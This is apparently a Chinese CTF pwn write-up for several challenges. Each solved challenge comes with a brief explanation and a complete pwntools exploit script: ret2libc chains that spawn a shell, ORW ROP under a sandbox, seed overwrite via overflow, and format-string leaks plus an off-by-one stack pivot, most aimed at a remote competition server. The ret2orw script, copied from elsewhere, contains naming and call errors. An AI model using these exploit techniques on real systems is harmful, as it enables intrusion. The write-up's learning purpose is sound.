girlfriend
第六个数组输入的时候,输入的值将决定循环的顺序,再填入后门
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24
| from pwn import * context(log_level='debug')
p=remote('27.25.151.12',25622)
ret=0x40101a gift=0x401216 payload=p64(gift)*5+b'admin'+b'\x00'*2 p.sendline(payload)
p.sendline(b'100') p.sendline(b'100') p.sendline(b'100') p.sendline(b'100') p.sendline(b'300')
p.sendline(b'5') p.sendlineafter(b'please input your 7 girlfriend birthday',b'1') p.sendlineafter(b'please input your 8 girlfriend birthday',b'4198942')
p.interactive()
|
ez_game
伪随机数通过溢出覆盖seed,再按照题目给的进行输入就好
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17
| from pwn import * from ctypes import * context(log_level='debug') p=remote('27.25.151.12',39274)
payload=b'a'*0x190+p64(1) p.sendline(payload) elf = cdll.LoadLibrary('./libc.so.6') elf.srand(1)
p.recvuntil('Round') for i in range(20001): a=elf.rand() % 7 + 1 p.sendline(str(a))
p.interactive()
|
ret2orw
题目开了沙箱,只能orw
这题本来想在本地写shellcode,在栈迁移到bss段执行,理论上应该可以,但是一直没有写出来
看了网上的wp,发现可以直接找open函数read函数和puts完成orw,下面的脚本是网上找到,自己加了点注释
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52
| from pwn import * context(os='linux', arch='amd64', log_level='debug')
libc = ELF("./libc.so.6")
e = ELF("./pwn") puts_plt = e.plt["puts"] puts_got = e.got["puts"] pop_rdi = 0x4012ce ret = 0x40101a main = 0x4012a1 bss = 0x4040a0 flag = bss + 0x100
print(shellcraft.open("./flag")) io = process("./pwn")
get_libc = b"a"*32 + b"b"*8 + p64(pop_rdi) + p64(puts_got) + p64(puts_plt) + p64(main) io.sendafter(b"oh,what's this?\n", get_libc) puts_addr = u64(io.recvuntil(b'\x7f').ljust(8,b'\x00'))
libc_base = puts_addr - libc.sym["puts"] print(hex(libc_base)) open_addr = libc_base + libc.sym["open"] read_addr = libc_base + libc.sym["read"] pop_rsi = libc_base + 0x2be51 pop_rdxi_r12 = libc_base + 0x11f2e7
gdb.attach(io) pause()
payload = b"c"*32 + b"d"*8
payload += p64(pop_rsi) + p64(bss) + p64(read_addr)
payload += p64(pop_rdi) + p64(bss) + p64(pop_rsi) + p64(0) +p64(pop_rdx_r12) + p64(0) + p64(0)+ p64(open_addr)
payload += p64(pop_rdi) + p64(3) + p64(pop_rsi) + p64(flag) + p64(pop_rdx_r12) + p64(0x100) + p64(0)+ p64(read_addr)
payload += p64(pop_rdi) + p64(flag) + p64(puts_addr)
io.send(payload)
io.send(b"./flag") io.interactive()
|
小蓝鲨stack
ret2libc注意printf要栈对齐
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54
| from pwn import * from LibcSearcher import * context(log_level='debug')
p=remote('27.25.151.12',32833) elf = ELF('./pwn') libc=ELF('./libc-2.31.so') pop_rdi=0x401293 puts_plt=elf.plt['printf'] puts_got=elf.got['printf'] ret=0x40101a offset=32
main_addr=elf.sym['main']
payload=b'a'*offset+b'a'*8
payload+=p64(pop_rdi) payload+=p64(puts_got) payload+=p64(ret) payload+=p64(puts_plt) payload+=p64(ret) payload+=p64(main_addr)
p.sendline(payload)
leak_addr = u64(p.recvuntil(b'\x7f')[-6:].ljust(8, b'\x00'))
log.success("leak_addr:{}".format((hex)(leak_addr)))
libc_base=leak_addr-libc.sym['printf'] system_addr=libc_base+libc.sym['system'] bin_sh_addr=libc_base+next(libc.search(b'/bin/sh'))
log.success("libc_base:{}".format((hex)(libc_base))) log.success("system_addr:{}".format((hex)(system_addr))) log.success("bin_sh_addr:{}".format((hex)(bin_sh_addr)))
payload2=b'a'*offset+b'a'*8 payload2+=p64(ret)+p64(pop_rdi) payload2+=p64(bin_sh_addr)+p64(system_addr)
p.sendline(payload2)
p.interactive()
|
0verf10w
格式化字符串把canary,libc,还有栈(后面利用off-by-one栈迁移)的地址泄露出来,刚好看到后面vuln有个off-by-one,通过溢出rbp后一个字节导致函数到我们写完数据的地方重启main函数
不知道为什么我本地打这个一直打不通,不过也就是最后一步,system函数被变成其他的,好在远程打得通,不然真怀疑人生了
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53
| from pwn import * context(log_level='debug') #p=process('./pwn') p=remote('27.25.151.12',30861)
libc = ELF("./libc.so.6") #libc=ELF('/lib/x86_64-linux-gnu/libc.so.6') p.sendlineafter(b' that?',b'aaaaaaaa') payload=b'aaaaaaaa%29$p%11$p%15$p%13$p'
def debug(): gdb.attach(p) pause()
#debug() p.sendline(payload) p.recvuntil(b'0x') canary=int(p.recv(14).ljust(16,b'0'),16) p.recvuntil(b'0x')
libc_base=int(p.recv(12),16)-0x29d90 p.recvuntil(b'0x')
stack=int(p.recv(12),16)-0x60
p.recvuntil(b'0x') main=int(p.recv(12),16)
system_addr = libc_base + libc.sym["system"] binsh_addr = libc_base + next(libc.search(b"/bin/sh")) pop_rdi = libc_base + 0x2a3e5 ret = libc_base+0x29139
last_byte = (stack & 0xFF)
print(hex(canary)) print(hex(main)) print(hex(libc_base))
payload=p64(canary)*2+p64(main)+p64(canary)+p8(last_byte) #debug() p.send(payload)
payload2=b'a'*(0x14-0x8)+p64(canary)*2+p64(pop_rdi) + p64(binsh_addr)+p64(ret)+p64(system_addr) p.sendline(payload2)
p.sendafter(b'a gift!',b'a') p.sendafter(b'again?????',b'a')
p.interactive()
|
syscall(没出)
给了三次执行syscall的机会,四个参数可以任意调整,不知道为什么利用shmget
+shmat
就把libc泄露出来了
orange
没学到io怎么打。。。。,回头学完再来